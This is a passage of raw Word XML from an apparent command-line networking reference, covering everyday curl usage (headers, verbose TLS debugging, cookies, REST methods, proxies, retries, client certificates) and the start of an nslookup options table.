        <w:t>: When content was last changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C202A6E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Web server software identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908703D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x-cache: HIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Response served from cache (not origin server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6A96D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>content-length</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Size of response body in bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575EAF8F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Check server response without downloading content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6681EF8B" w14:textId="132E96D6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Verbose output for debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF853C"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v https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31370B31" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B519B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Trying 93.184.216.34:443...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A83CD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Connected to example.com (93.184.216.34) port 443 (#0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76323F1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ALPN, offering h2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB70C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ALPN, offering http/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1191D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successfully set certificate verify locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59143334"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CAfile: /etc/ssl/certs/ca-certificates.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD383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CApath: /etc/ssl/certs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B638101"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TLSv1.3 (OUT), TLS handshake, Client hello (1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359058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TLSv1.3 (IN), TLS handshake, Server hello (2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935600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TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB307C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TLSv1.3 (IN), TLS handshake, Certificate (11):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D249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TLSv1.3 (IN), TLS handshake, CERT verify (15):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1BEE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TLSv1.3 (IN), TLS handshake, Finished (20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4612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TLSv1.3 (OUT), TLS handshake, Finished (20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140F854"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SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1483877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ALPN, server accepted to use h2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F05E4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Server certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DD4A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subject: C=US; ST=California; L=Los Angeles; O=Internet Corporation for Assigned Names and Numbers; CN=www.example.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB33AF1"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start date: Mar 14 00:00:00 2024 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9259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expire date: Mar 13 23:59:59 2025 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752E27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subjectAltName: host "example.com" matched cert's "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6272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issuer: C=US; O=DigiCert Inc; CN=DigiCert TLS RSA SHA256 2020 CA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8C0A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SSL certificate verify ok.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B64D84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t; GET / HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA32C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t; Host: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AAFF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t; user-agent: curl/7.81.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E89DA"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t; accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB3D3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gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8830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TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C897A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lt; HTTP/2 200 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E231A"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lt; content-encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404582F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lt; accept-ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD6A56"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Response content follows...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA538B7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Debug connection issues and see full HTTP exchange.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D854A" w14:textId="75AE3C0D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Ignore SSL certificate errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F6CA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k https://self-signed.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA83DC7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test HTTPS endpoints with self-signed certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356BF7A" w14:textId="23962F2C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Set User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC906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A "Mozilla/5.0 (custom bot)" https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C742C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Mimic specific browsers or identify your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07416AAB" w14:textId="7E23392B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Handle cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5DBD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b cookies.txt -c cookies.txt https://example.com/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEC106" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Maintain session state across requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FC831" w14:textId="26F70A1C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>PUT request to update data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FBE7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X PUT -H "Content-Type: application/json" -d '{"status":"updated"}' https://api.example.com/resource/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119C933" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Update resources via REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75485C53" w14:textId="53F70982" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>DELETE request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AE23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X DELETE https://api.example.com/resource/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609496B7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Delete resources via REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66E2BE" w14:textId="3EFD0BCC" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Form data submission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69155AF4"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X POST -d "username=john&amp;password=secret" https://example.com/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F2ADD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Submit HTML forms programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C5386" w14:textId="391D6404" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Measure response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D239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w "Total time: %{time_total}s\n" -o /dev/null -s https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BC8AD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Performance testing and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E66BF" w14:textId="7262E33A" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Proxy usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068755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proxy proxy.company.com:8080 https://external-api.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62698CA6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Access external resources through corporate proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645AF8C" w14:textId="4607AC31" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Multiple URLs in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C4F46"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https://api1.example.com &amp; curl https://api2.example.com &amp; wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829F9DB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test multiple endpoints simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D634710" w14:textId="10DA299B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9F7F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limit-rate 100k https://large-file.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C503638" w14:textId="309F951C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Control bandwidth usage during downloads.Retry on failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CE66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retry 3 --retry-delay 2 https://unreliable-api.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EB729" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Handle temporary network issues automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A561E8" w14:textId="6BB3FE68" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Client certificate authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9DC1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cert client.crt --key client.key https://secure-api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B890E4" w14:textId="1A0B8EFC" w:rsidR="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6693B47A" w14:textId="28DC0DFD" w:rsidR="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D6440" w14:textId="206EBF96" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Mutual TLS authentication with client certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABDBDE" w14:textId="0B8861B2" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>JSON data with modern syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1EADB6"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json '{"key":"value"}' https://api.example.com/endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB05B1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Simplified JSON posting (requires curl 7.82+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C164AB0" w14:textId="508E6D41" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Compressed responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C37A6"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url --compressed https://api.example.com/large-response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FC2DB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Reduce bandwidth usage with gzip compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6C9EB" w14:textId="58EEC62D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>DNS Resolution Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD026D" w14:textId="74ACB95D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43096E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command queries DNS servers to obtain domain name or IP address mapping information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CDA824" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8251F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Query DNS servers for domain name resolution, reverse lookups, and DNS record information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1175115F" w14:textId="24252F09" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53282DC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slookup [query] [server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4770CA9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slookup [-option] [query] [server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19C007" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2064"/>
        <w:gridCol w:w="5804"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="19392259" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE8A1F5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A9A36E7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1E44DA75" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FE76F6C"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query=TYPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CAA59D4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set query type (A, AAAA, CNAME, MX, NS, PTR, SOA, TXT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2F7BE224" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="527D7612"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type=TYPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="322779E4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Same as -query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5EFD5445" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E9F4F6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domain=NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00B5F179" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set default domain name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0DE475A9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3796C671"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earch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E47A728" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use domain search list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0205AF5A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10829CDA"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port=PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
